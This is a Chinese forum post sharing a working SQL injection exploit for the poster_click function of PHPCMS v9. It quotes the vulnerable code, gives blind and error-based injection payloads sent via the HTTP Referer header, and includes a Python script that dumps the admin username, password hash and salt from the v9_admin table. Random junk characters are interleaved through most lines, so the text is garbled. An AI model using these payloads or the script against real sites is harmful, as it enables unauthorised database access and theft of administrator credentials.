有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
$ R* P" O! A* l8 e+ p6 Z! x3 {2 _0 y2 T, t0 E3 R7 V( @ r
问题函数\phpcms\modules\poster\index.php
" ~! ~" B6 A$ h1 f8 U0 L2 S8 W; z0 h% c" a$ c8 D+ Y
public function poster_click() {$ B2 o3 O1 h; @% O6 @1 w8 W8 I: o4 r% ^+ I
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
( `5 o& o: n* P/ M2 z4 e$r = $this->db->get_one(array('id'=>$id));( O# N0 }/ A+ M( _
if (!is_array($r) && empty($r)) return false;; j' K; x+ |: W2 _
$ip_area = pc_base::load_sys_class('ip_area');& q9 a+ C6 a' \* [( Z* N
$ip = ip();
* g1 H% I; i2 g. o7 v* |9 i: i$area = $ip_area->get($ip);
2 d' D) i& w7 F. `& S$username = param::get_cookie('username') ? param::get_cookie('username') : '';6 }1 {6 o2 ?/ F5 q4 n0 B1 Y4 N
if($id) {
J6 h3 J. n7 Y3 a$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();% q6 B1 h" i ]
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
8 _4 t) { `3 X/ p}
. p( |6 u+ B) g+ r9 U5 x: [$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));0 L: e; j& @# A5 J
$setting = string2array($r['setting']);
6 }0 q1 D$ {4 k. g' s. _if (count($setting)==1) {* ^" ~; K6 z, F% x: Q
$url = $setting['1']['linkurl']; r o0 ?: {3 T/ M9 T
} else {6 H5 J) }$ k2 h# j% @
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];$ R; g, y* e, J2 p$ ~
}
# B9 u2 @1 H) p9 s8 L+ \4 h+ ?header('Location: '.$url);. w2 H, ~. |! g! o; x; d* ]3 H7 Z: Q
}& z& H. n5 B1 \! z% U) J& E
+ B2 U$ ` x0 Y: k
8 N9 R3 V5 ]5 }& H" M& Z1 e3 Q/ Q" U
利用方式:& u, l# @7 z8 Z
4 Y% L6 j2 j# v5 c* ?( ]1、可以采用盲注入的手法:) l* ?% }# c5 E; C7 _& a! b
/ a3 n. k6 U! t5 ^ E6 t5 Oreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
L+ y* Q- E0 r0 ]- j1 Q" a
7 }7 ^' A' U: T- V$ ]/ `通过返回页面,正常与否一个个猜解密码字段。
7 P/ j. Q7 D* ]) p
$ |+ ]1 Z( p- r3 N, I# t# s2、代码是花开写的,随手附上了:9 L. [' \3 V. r" B' P9 M) o
9 a$ r0 |& F' s1 s0 e/ I
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#9 y; _4 A# c1 ]7 A
+ v; o1 x5 L+ ?& ?5 B& i/ m此方法是爆错注入手法,原理自查。
( _8 g! Q4 ^1 F1 d# S8 d+ ^- T# b7 l$ b0 C. I( w% Y3 ?( c
6 q0 H3 }! p( h; T/ D5 P3 {/ ~+ ]1 `
利用程序:) ~. H# v' V2 X) G5 j R
$ x/ P& P! v5 C0 H. z3 j0 v' f% w6 m#!/usr/bin/env python0 {8 z" }! m3 g, D" Y6 z
import httplib,sys,re! X; ~) l, n1 b0 j7 x
. g: _: G) D# A4 idef attack():4 }0 H+ y& F0 P% G/ m( N# `: d
print “Code by Pax.Mac Team conqu3r!”
7 Q4 x, h& d1 K- v6 Y: Q" Sprint “Welcome to our zone!!!”+ t9 F5 l, q3 p% G/ _1 `3 a5 w+ M
url=sys.argv[1]: i8 G3 W& C% v/ F. B
paths=sys.argv[2]
2 s" f% U( L. i9 Q/ |; Lconn = httplib.HTTPConnection(url)1 w: T8 G7 u; T. {% b. K
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,( P0 Q8 b2 j( f; p' M- S( d
“Accept”: “text/plain”,
; N* e& |6 t! G% O! T“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}/ C; U/ k: Z7 E: V' ?: l# h! |
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers). ?" M8 b3 F: j
r1 = conn.getresponse()
% I3 d$ T N% o, O& z, Z1 _datas=r1.read()' Z" k k, z* Q( D, }5 P: |
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
: S/ ]3 Y$ ], q$ T* T- P0 |print datas[0]
7 o8 f& C' {. j i5 G" i A4 oconn.close()
( d8 \+ I0 f9 R1 l8 {1 wif __name__==”__main__”:9 k+ s; v5 }( V
if len(sys.argv)<3:
! w. g j; p& }0 dprint “Code by Pax.Mac Team conqu3r”
8 j Q- o+ ]2 I% Dprint “Usgae:”
% P: G; A- Q4 b% ^- K8 |print “ phpcmsattack.py www.paxmac.org /”
4 n9 O# Z( K/ y; q# f. dprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
% S( j; D: P( v) M0 Vsys.exit(1)
: l% Y8 G9 ]8 ]0 ^/ c, \9 Zattack()
9 q% X) w Y- R( H) t, {" p6 Z; J8 ~2 h& l: ~6 N$ `7 U) A/ M$ O8 f: ?/ B ]
|
发表于 2013-1-11 21:01:00
收藏
支持
反对